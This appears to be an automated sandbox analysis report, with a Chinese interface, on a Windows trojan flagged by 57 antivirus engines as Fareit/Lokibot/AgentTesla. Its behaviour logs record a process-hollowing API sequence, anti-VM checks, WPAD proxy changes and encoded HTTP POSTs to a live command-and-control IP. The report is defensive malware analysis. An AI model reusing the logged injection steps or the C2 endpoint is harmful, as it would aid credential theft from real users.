8.8
极危
57 个模型检测该样本为恶意!
重新分析
更多

8480058fc20ebfef47d1ebccbb54b88f656715b99c2d4e80ad46b05906ff4dbe

b56d97ba158e3e81cfc1ed65376bf131.exe

分析耗时

75s

最近分析

文件大小

726.0KB
静态报毒 动态报毒 100% AGEN AGENTTESLA AI SCORE=100 ALI2000015 AUTO AZORULT CLASSIC CONFIDENCE DELF DELFINJECT DELPHILESS EMZL ENAI FAREIT GENERICKD GENETIC HIGH CONFIDENCE HRMDCV KRYPTIK LOKIBOT MALWARE@#11TR2S86TCVEG ORWQ R + TROJ R002C0DHI20 SCORE SUSGEN TGW@A4GQIWII TSCOPE UNSAFE X2094 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Tencent Win32.Trojan.Inject.Auto 20201226 1.0.0.1
Kingsoft 20201226 2017.9.26.565
McAfee Fareit-FPQ!B56D97BA158E 20201226 6.0.6.653
Avast Win32:Trojan-gen 20201226 21.1.5827.0
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (2 个事件)
Time & API Arguments Status Return Repeated
1619885621.193374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619885621.193374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619885621.162374
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://136.144.237.217/index.php
Performs some HTTP requests (1 个事件)
request POST http://136.144.237.217/index.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://136.144.237.217/index.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619861119.779372
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619861119.983372
NtProtectVirtualMemory
process_identifier: 472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 77824
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00472000
success 0 0
1619861119.998372
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005e0000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619885621.975374
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.508624119375818 section {'size_of_data': '0x00025400', 'virtual_address': '0x00096000', 'entropy': 7.508624119375818, 'name': '.rsrc', 'virtual_size': '0x00025380'} description A section with a high entropy has been found
entropy 0.20551724137931035 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 136.144.237.217
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: @çŸÈ™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619885624.756374
RegSetValueExW
key_handle: 0x00000358
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: @çŸÈ™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619885624.865374
RegSetValueExW
key_handle: 0x00000354
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: ‚É™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619885626.240374
RegSetValueExW
key_handle: 0x000003b8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: ‚É™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 472 called NtSetContextThread to modify thread in remote process 152
Time & API Arguments Status Return Repeated
1619861120.561372
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4301304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 152
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 472 resumed a thread in remote process 152
Time & API Arguments Status Return Repeated
1619861121.045372
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 152
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619861120.420372
CreateProcessInternalW
thread_identifier: 2244
thread_handle: 0x000000f8
process_identifier: 152
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\b56d97ba158e3e81cfc1ed65376bf131.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x000000fc
inherit_handles: 0
success 1 0
1619861120.420372
NtUnmapViewOfSection
process_identifier: 152
region_size: 4096
process_handle: 0x000000fc
base_address: 0x00400000
success 0 0
1619861120.420372
NtMapViewOfSection
section_handle: 0x00000104
process_identifier: 152
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x000000fc
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619861120.561372
NtGetContextThread
thread_handle: 0x000000f8
success 0 0
1619861120.561372
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4301304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 152
success 0 0
1619861121.045372
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 152
success 0 0
1619885621.178374
NtResumeThread
thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 152
success 0 0
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34374041
FireEye Generic.mg.b56d97ba158e3e81
ALYac Trojan.GenericKD.34374041
Cylance Unsafe
Zillya Trojan.Injector.Win32.762513
Sangfor Malware
K7AntiVirus Trojan ( 0056c99c1 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Trojan ( 0056c99c1 )
Cybereason malicious.a158e3
Arcabit Trojan.Generic.D20C8199
Cyren W32/Injector.ORWQ-3620
Symantec Infostealer.Lokibot!43
APEX Malicious
Paloalto generic.ml
ClamAV Win.Keylogger.AgentTesla-9372622-1
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.34374041
NANO-Antivirus Trojan.Win32.Kryptik.hrmdcv
Tencent Win32.Trojan.Inject.Auto
Ad-Aware Trojan.GenericKD.34374041
Emsisoft Trojan.GenericKD.34374041 (B)
Comodo Malware@#11tr2s86tcveg
F-Secure Heuristic.HEUR/AGEN.1138685
DrWeb Trojan.PWS.Stealer.29093
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0DHI20
McAfee-GW-Edition BehavesLike.Win32.Fareit.bh
MaxSecure Trojan.Malware.300983.susgen
Sophos Mal/Generic-R + Troj/Azorult-FU
Jiangmin Trojan.Kryptik.cbz
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1138685
Antiy-AVL Trojan/Win32.Kryptik
Gridinsoft Trojan.Win32.Kryptik.oa
Microsoft Trojan:Win32/Fareit.VD!MTB
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.34374041
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
McAfee Fareit-FPQ!B56D97BA158E
MAX malware (ai score=100)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack
Panda Trj/Genetic.gen
ESET-NOD32 a variant of Win32/Injector.ENAI
TrendMicro-HouseCall TROJ_GEN.R002C0DHI20
Rising Trojan.Kryptik!1.CAC0 (CLASSIC)
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x488164 VirtualFree
0x488168 VirtualAlloc
0x48816c LocalFree
0x488170 LocalAlloc
0x488174 GetVersion
0x488178 GetCurrentThreadId
0x488184 VirtualQuery
0x488188 WideCharToMultiByte
0x488190 MultiByteToWideChar
0x488194 lstrlenA
0x488198 lstrcpynA
0x48819c LoadLibraryExA
0x4881a0 GetThreadLocale
0x4881a4 GetStartupInfoA
0x4881a8 GetProcAddress
0x4881ac GetModuleHandleA
0x4881b0 GetModuleFileNameA
0x4881b4 GetLocaleInfoA
0x4881b8 GetLastError
0x4881c0 GetCommandLineA
0x4881c4 FreeLibrary
0x4881c8 FindFirstFileA
0x4881cc FindClose
0x4881d0 ExitProcess
0x4881d4 WriteFile
0x4881dc RtlUnwind
0x4881e0 RaiseException
0x4881e4 GetStdHandle
Library user32.dll:
0x4881ec GetKeyboardType
0x4881f0 LoadStringA
0x4881f4 MessageBoxA
0x4881f8 CharNextA
Library advapi32.dll:
0x488200 RegQueryValueExA
0x488204 RegOpenKeyExA
0x488208 RegCloseKey
Library oleaut32.dll:
0x488210 SysFreeString
0x488214 SysReAllocStringLen
0x488218 SysAllocStringLen
Library kernel32.dll:
0x488220 TlsSetValue
0x488224 TlsGetValue
0x488228 LocalAlloc
0x48822c GetModuleHandleA
Library advapi32.dll:
0x488234 RegQueryValueExA
0x488238 RegOpenKeyExA
0x48823c RegCloseKey
Library kernel32.dll:
0x488244 lstrcpyA
0x488248 WriteFile
0x48824c WaitForSingleObject
0x488250 VirtualQuery
0x488254 VirtualProtect
0x488258 VirtualAlloc
0x48825c Sleep
0x488260 SizeofResource
0x488264 SetThreadLocale
0x488268 SetFilePointer
0x48826c SetEvent
0x488270 SetErrorMode
0x488274 SetEndOfFile
0x488278 ResetEvent
0x48827c ReadFile
0x488280 MultiByteToWideChar
0x488284 MulDiv
0x488288 LockResource
0x48828c LoadResource
0x488290 LoadLibraryA
0x48829c GlobalUnlock
0x4882a0 GlobalReAlloc
0x4882a4 GlobalHandle
0x4882a8 GlobalLock
0x4882ac GlobalFree
0x4882b0 GlobalFindAtomA
0x4882b4 GlobalDeleteAtom
0x4882b8 GlobalAlloc
0x4882bc GlobalAddAtomA
0x4882c0 GetVersionExA
0x4882c4 GetVersion
0x4882c8 GetTickCount
0x4882cc GetThreadLocale
0x4882d4 GetSystemInfo
0x4882d8 GetStringTypeExA
0x4882dc GetStdHandle
0x4882e0 GetProcAddress
0x4882e4 GetModuleHandleA
0x4882e8 GetModuleFileNameA
0x4882ec GetLocaleInfoA
0x4882f0 GetLocalTime
0x4882f4 GetLastError
0x4882f8 GetFullPathNameA
0x4882fc GetFileAttributesA
0x488300 GetDiskFreeSpaceA
0x488304 GetDateFormatA
0x488308 GetCurrentThreadId
0x48830c GetCurrentProcessId
0x488310 GetCPInfo
0x488314 GetACP
0x488318 FreeResource
0x488320 InterlockedExchange
0x488328 FreeLibrary
0x48832c FormatMessageA
0x488330 FindResourceA
0x488334 FindNextFileA
0x488338 FindFirstFileA
0x48833c FindClose
0x48834c EnumCalendarInfoA
0x488358 CreateThread
0x48835c CreateFileA
0x488360 CreateEventA
0x488364 CompareStringA
0x488368 CloseHandle
Library version.dll:
0x488370 VerQueryValueA
0x488378 GetFileVersionInfoA
Library gdi32.dll:
0x488380 UnrealizeObject
0x488384 StretchBlt
0x488388 SetWindowOrgEx
0x48838c SetViewportOrgEx
0x488390 SetTextColor
0x488394 SetStretchBltMode
0x488398 SetROP2
0x48839c SetPixel
0x4883a0 SetDIBColorTable
0x4883a4 SetBrushOrgEx
0x4883a8 SetBkMode
0x4883ac SetBkColor
0x4883b0 SelectPalette
0x4883b4 SelectObject
0x4883b8 SaveDC
0x4883bc RestoreDC
0x4883c0 RectVisible
0x4883c4 RealizePalette
0x4883c8 PatBlt
0x4883cc MoveToEx
0x4883d0 MaskBlt
0x4883d4 LineTo
0x4883d8 IntersectClipRect
0x4883dc GetWindowOrgEx
0x4883e0 GetTextMetricsA
0x4883ec GetStockObject
0x4883f0 GetPixel
0x4883f4 GetPaletteEntries
0x4883f8 GetObjectA
0x4883fc GetDeviceCaps
0x488400 GetDIBits
0x488404 GetDIBColorTable
0x488408 GetDCOrgEx
0x488410 GetClipBox
0x488414 GetBrushOrgEx
0x488418 GetBitmapBits
0x48841c ExtTextOutA
0x488420 ExcludeClipRect
0x488424 DeleteObject
0x488428 DeleteDC
0x48842c CreateSolidBrush
0x488430 CreatePenIndirect
0x488434 CreatePalette
0x48843c CreateFontIndirectA
0x488440 CreateDIBitmap
0x488444 CreateDIBSection
0x488448 CreateCompatibleDC
0x488450 CreateBrushIndirect
0x488454 CreateBitmap
0x488458 BitBlt
Library user32.dll:
0x488460 CreateWindowExA
0x488464 WindowFromPoint
0x488468 WinHelpA
0x48846c WaitMessage
0x488470 UpdateWindow
0x488474 UnregisterClassA
0x488478 UnhookWindowsHookEx
0x48847c TranslateMessage
0x488484 TrackPopupMenu
0x48848c ShowWindow
0x488490 ShowScrollBar
0x488494 ShowOwnedPopups
0x488498 ShowCursor
0x48849c SetWindowsHookExA
0x4884a0 SetWindowTextA
0x4884a4 SetWindowPos
0x4884a8 SetWindowPlacement
0x4884ac SetWindowLongA
0x4884b0 SetTimer
0x4884b4 SetScrollRange
0x4884b8 SetScrollPos
0x4884bc SetScrollInfo
0x4884c0 SetRect
0x4884c4 SetPropA
0x4884c8 SetParent
0x4884cc SetMenuItemInfoA
0x4884d0 SetMenu
0x4884d4 SetForegroundWindow
0x4884d8 SetFocus
0x4884dc SetCursor
0x4884e0 SetClassLongA
0x4884e4 SetCapture
0x4884e8 SetActiveWindow
0x4884ec SendMessageA
0x4884f0 ScrollWindow
0x4884f4 ScreenToClient
0x4884f8 RemovePropA
0x4884fc RemoveMenu
0x488500 ReleaseDC
0x488504 ReleaseCapture
0x488510 RegisterClassA
0x488514 RedrawWindow
0x488518 PtInRect
0x48851c PostQuitMessage
0x488520 PostMessageA
0x488524 PeekMessageA
0x488528 OffsetRect
0x48852c OemToCharA
0x488530 MessageBoxA
0x488534 MapWindowPoints
0x488538 MapVirtualKeyA
0x48853c LoadStringA
0x488540 LoadKeyboardLayoutA
0x488544 LoadIconA
0x488548 LoadCursorA
0x48854c LoadBitmapA
0x488550 KillTimer
0x488554 IsZoomed
0x488558 IsWindowVisible
0x48855c IsWindowEnabled
0x488560 IsWindow
0x488564 IsRectEmpty
0x488568 IsIconic
0x48856c IsDialogMessageA
0x488570 IsChild
0x488574 InvalidateRect
0x488578 IntersectRect
0x48857c InsertMenuItemA
0x488580 InsertMenuA
0x488584 InflateRect
0x48858c GetWindowTextA
0x488590 GetWindowRect
0x488594 GetWindowPlacement
0x488598 GetWindowLongA
0x48859c GetWindowDC
0x4885a0 GetTopWindow
0x4885a4 GetSystemMetrics
0x4885a8 GetSystemMenu
0x4885ac GetSysColorBrush
0x4885b0 GetSysColor
0x4885b4 GetSubMenu
0x4885b8 GetScrollRange
0x4885bc GetScrollPos
0x4885c0 GetScrollInfo
0x4885c4 GetPropA
0x4885c8 GetParent
0x4885cc GetWindow
0x4885d0 GetMenuStringA
0x4885d4 GetMenuState
0x4885d8 GetMenuItemInfoA
0x4885dc GetMenuItemID
0x4885e0 GetMenuItemCount
0x4885e4 GetMenu
0x4885e8 GetLastActivePopup
0x4885ec GetKeyboardState
0x4885f4 GetKeyboardLayout
0x4885f8 GetKeyState
0x4885fc GetKeyNameTextA
0x488600 GetInputState
0x488604 GetIconInfo
0x488608 GetForegroundWindow
0x48860c GetFocus
0x488610 GetDlgItem
0x488614 GetDesktopWindow
0x488618 GetDCEx
0x48861c GetDC
0x488620 GetCursorPos
0x488624 GetCursor
0x488628 GetClientRect
0x48862c GetClassNameA
0x488630 GetClassInfoA
0x488634 GetCapture
0x488638 GetActiveWindow
0x48863c FrameRect
0x488640 FindWindowA
0x488644 FillRect
0x488648 EqualRect
0x48864c EnumWindows
0x488650 EnumThreadWindows
0x488654 EndPaint
0x488658 EnableWindow
0x48865c EnableScrollBar
0x488660 EnableMenuItem
0x488664 DrawTextA
0x488668 DrawMenuBar
0x48866c DrawIconEx
0x488670 DrawIcon
0x488674 DrawFrameControl
0x488678 DrawFocusRect
0x48867c DrawEdge
0x488680 DispatchMessageA
0x488684 DestroyWindow
0x488688 DestroyMenu
0x48868c DestroyIcon
0x488690 DestroyCursor
0x488694 DeleteMenu
0x488698 DefWindowProcA
0x48869c DefMDIChildProcA
0x4886a0 DefFrameProcA
0x4886a4 CreatePopupMenu
0x4886a8 CreateMenu
0x4886ac CreateIcon
0x4886b0 ClientToScreen
0x4886b4 CheckMenuItem
0x4886b8 CallWindowProcA
0x4886bc CallNextHookEx
0x4886c0 BeginPaint
0x4886c4 CharNextA
0x4886c8 CharLowerBuffA
0x4886cc CharLowerA
0x4886d0 CharToOemA
0x4886d4 AdjustWindowRectEx
Library kernel32.dll:
0x4886e0 Sleep
Library oleaut32.dll:
0x4886e8 SafeArrayPtrOfIndex
0x4886ec SafeArrayGetUBound
0x4886f0 SafeArrayGetLBound
0x4886f4 SafeArrayCreate
0x4886f8 VariantChangeType
0x4886fc VariantCopy
0x488700 VariantClear
0x488704 VariantInit
Library ole32.dll:
0x48870c CoCreateInstance
0x488710 CoUninitialize
0x488714 CoInitialize
Library oleaut32.dll:
0x48871c CreateErrorInfo
0x488720 GetErrorInfo
0x488724 SetErrorInfo
0x488728 SysFreeString
Library comctl32.dll:
0x488738 ImageList_Write
0x48873c ImageList_Read
0x48874c ImageList_DragMove
0x488750 ImageList_DragLeave
0x488754 ImageList_DragEnter
0x488758 ImageList_EndDrag
0x48875c ImageList_BeginDrag
0x488760 ImageList_Remove
0x488764 ImageList_DrawEx
0x488768 ImageList_Replace
0x48876c ImageList_Draw
0x48877c ImageList_Add
0x488784 ImageList_Destroy
0x488788 ImageList_Create
Library comdlg32.dll:
0x488790 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 136.144.237.217 80
192.168.56.101 49181 136.144.237.217 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://136.144.237.217/index.php 
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 136.144.237.217
Content-Length: 113
Cache-Control: no-cache

J/\xfb8/\xfb4/\xfb<H\xed>2\xed>9\xed>:\xed?N\xed>8\xed>2\xed><\x8b(9\xfbIL\x8b(8\x8c(9\xffK/\xfb?/\xfb>/\xfb8/\xfb</\xfb>/\xfb8/\xfaI/\xfb9/\xfb9/\xfb5/\xfb?/\xfb:O\xed>?\xed>9\xed?N\xed>2\xed><\x89(9\xfaN/\xfb4/\xfb4/\xfb5O
http://136.144.237.217/index.php 
POST /index.php HTTP/1.0
Host: 136.144.237.217
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 113

J/?/?/?H?2?9?:?N?8?2?<?9\xfbIL?8?9\xffK/?/?/?/?/?/?/\xfaI/?/?/?/?/?O???9?N?2?<?9\xfaN/?/?/?O

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.